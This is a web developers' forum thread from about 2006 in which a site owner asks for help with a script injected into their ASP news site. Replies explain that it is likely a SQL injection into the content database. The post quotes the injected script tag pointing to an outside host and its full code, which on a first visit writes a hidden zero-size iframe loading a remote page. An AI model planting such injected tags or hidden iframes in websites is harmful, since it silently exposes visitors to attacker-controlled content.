Hello and welcome to our community! Is this your first visit?
Register
Enjoy an ad free experience by logging in. Not a member yet? Register.
Results 1 to 5 of 5
  1. #1
    New to the CF scene
    Join Date
    Oct 2006
    Posts
    2
    Thanks
    0
    Thanked 0 Times in 0 Posts

    JavaScript Causing Problem On Website

    I am posting this here hoping that someone can help me with a problem that I am having on my website and get rid of it.

    I recently took over a video game related website. All of our updating is done through ASP scripts. Well yesterday, a javascript somehow got on to our site and is wiping out of all of the Headers of our news posts. I am not sure how it got in there or where it is, but I need help in removing it.

    Here is the script that was added to our site: <script src="http://newasp.com.cn/count.js"></script>

    Here are the contents of the script:

    Code:
    function GetCookie (name) {
    var arg = name + "=";
    var alen = arg.length;
    var clen = document.cookie.length;
    var i = 0;
    while (i < clen) {
    var j = i + alen;
    if (document.cookie.substring(i, j) == arg)
    return getCookieVal (j);
    i = document.cookie.indexOf(" ", i) + 1;
    if (i == 0) break;
    }
    return null;
    }
    
    function SetCookie (name, value) {
    var argv = SetCookie.arguments;
    var argc = SetCookie.arguments.length;
    var expires = (argc > 2) ? argv[2] : null;
    var path = (argc > 3) ? argv[3] : null;
    var domain = (argc > 4) ? argv[4] : null;
    var secure = (argc > 5) ? argv[5] : false;
    document.cookie = name + "=" + escape (value) +
    ((expires == null) ? "" : ("; expires=" + expires.toGMTString())) +
    ((path == null) ? "" : ("; path=" + path)) +
    ((domain == null) ? "" : ("; domain=" + domain)) +
    ((secure == true) ? "; secure" : "");
    }
    
    function DeleteCookie (name) {
    var exp = new Date();
    exp.setTime (exp.getTime() - 1);
    // This cookie is history
    var cval = 0;
    document.cookie = name + "=" + cval + "; expires=" + exp.toGMTString();
    }
    var expDays = 1;
    var exp = new Date();
    exp.setTime(exp.getTime() + (expDays*24*60*60*1000));
    
    function amt(){
    var count = GetCookie('count');
    //var count;
    //alert(count);
    //count = null;
    if(count == null) {
    SetCookie('count','1')
    return 1
    }
    else{
    var newcount = parseInt(count) + 1;
    if(newcount<2) count=1;
    SetCookie('count',newcount,exp);
    //DeleteCookie('count')
    return newcount
    }
    }
    
    function getCookieVal(offset) {
    var endstr = document.cookie.indexOf (";", offset);
    if (endstr == -1)
    endstr = document.cookie.length;
    return unescape(document.cookie.substring(offset, endstr));
    }
    function sethome(){
    document.write('<iframe src="http://newasp.com.cn/baidu/baidu.htm" width="0" height="0" scrolling="no" frameborder="0"></iframe>');
    
    }
    if(amt()==1)
    {
    sethome()
    }

    Can anyone help me determine exactly what this is and how to get rid of it?

    All of this is Greek to me, and my web guy is unavailable right now.

    If this is not the right place for this, can you point me in the right direction?

    Thanks in advance for all of your help.

  • #2
    Kor
    Kor is offline
    Red Devil Mod Kor's Avatar
    Join Date
    Apr 2003
    Location
    Bucharest, ROMANIA
    Posts
    8,478
    Thanks
    58
    Thanked 379 Times in 375 Posts
    why not simply remove
    <script src="http://newasp.com.cn/count.js"></script>
    ?
    KOR
    Offshore programming
    -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*

  • #3
    New to the CF scene
    Join Date
    Oct 2006
    Posts
    2
    Thanks
    0
    Thanked 0 Times in 0 Posts
    Quote Originally Posted by Kor View Post
    why not simply remove
    <script src="http://newasp.com.cn/count.js"></script>
    ?
    Because I can not find that script anywhere in our code.

  • #4
    Supreme Master coder! Philip M's Avatar
    Join Date
    Jun 2002
    Location
    London, England
    Posts
    18,316
    Thanks
    203
    Thanked 2,566 Times in 2,544 Posts
    Quote Originally Posted by NLG Chris View Post
    Because I can not find that script anywhere in our code.
    He did not say remove the script. He said remove the line in your code which is calling your script.

    "Here is the script that was added to our site: <script src="http://newasp.com.cn/count.js"></script>"

  • #5
    New to the CF scene
    Join Date
    Jan 2007
    Posts
    1
    Thanks
    0
    Thanked 0 Times in 0 Posts
    Hi Chris,
    You probably know by now, but the line of code you are describing is probably coming from the database (not an actual line of code). This is a bit of a common hack, you will probably find someone has injected an SQL statement into your database via one of your pages. Changing a database field to contain this "script" tag.
    Best check the whole of your content management database to see if it appears anywhere else, but if you google the http that the iframe calls, you will notice that there is a fair few site that have been hacked with this code!

    Good luck.
    Andy.


  •  

    Posting Permissions

    • You may not post new threads
    • You may not post replies
    • You may not post attachments
    • You may not edit your posts
    •